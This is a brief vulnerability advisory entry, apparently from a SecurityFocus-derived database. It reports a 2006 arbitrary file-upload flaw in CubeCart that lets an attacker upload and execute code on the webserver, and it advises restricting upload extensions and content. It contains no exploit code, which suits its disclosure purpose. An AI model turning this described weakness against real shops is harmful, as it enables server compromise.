Vendor: CubeCart
By: SecurityFocus
CVSS: 7.5 (HIGH)
Arbitrary File Upload
CWE: 434
Product Name: CubeCart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
CubeCart Arbitrary File Upload Vulnerability
CubeCart is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Mitigation:
Ensure that the application is configured to allow uploads only of files with appropriate extensions and appropriate content.